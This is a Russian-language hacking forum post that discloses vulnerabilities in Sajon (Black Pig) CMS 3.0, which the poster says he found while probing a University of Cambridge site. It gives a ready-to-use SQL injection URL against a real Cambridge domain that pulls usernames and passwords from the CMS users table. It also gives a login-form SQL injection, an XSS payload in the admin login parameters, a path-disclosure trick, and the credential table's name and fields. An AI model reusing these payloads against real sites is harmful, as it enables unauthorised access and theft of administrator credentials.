Уязвимости Sajon CMS 3.0

Discussion in 'Веб-уязвимости' started by $n@ke, 26 Dec 2008.

  1. $n@ke

    $n@ke Elder - Старейшина

    Joined:
    18 Sep 2006
    Messages:
    696
    Likes Received:
    404
    Reputations:
    134
    Уязвимости Black Pig (Sajon) CMS 3.0

    Наткнулса исследуя Университет Кембриджа:
    Данная CMS не очень распространена, однако на ней несколько ПИАРистых сайтов работают.

    Sql-inj​

    1. Имя файла может меняться, но уязвим параметр key
    PHP:
    http://www.enterprise.cam.ac.uk/archive.php?key=24+UNION+SELECT+username,password+FROM+cmscamenter.cms_users-- 
    2. Скуля в админке, при авторизации
    PHP:
    POST
    formloginuser
    =%00'
    XSS​

    PHP:
    http://www.site.com/cms/admin.php
    POST
    action
    =login&gomodule=>"><script%20%0a%0d>alert(KU-KU,7750312847)%3B</Script>
    Тоже самое в goid,gopage
    Админка:
    PHP:
    site.com/cms/
    Раскрытие пути​

    PHP:
    http://www.site.com/cms/admin.php
    в поле логина ставим ОДИНАРНУЮ КАВЫЧКУ
    PHP:
    Tablecms_users
    Fields
    username,password
    Author: The Black Pig Design Co Ltd
    www.blackpig.co.uk


    Сорцов нет;аплоад,судя по логам-есть, но я ненашел.
     
    #1 $n@ke, 26 Dec 2008
    Last edited: 26 Dec 2008
    2 people like this.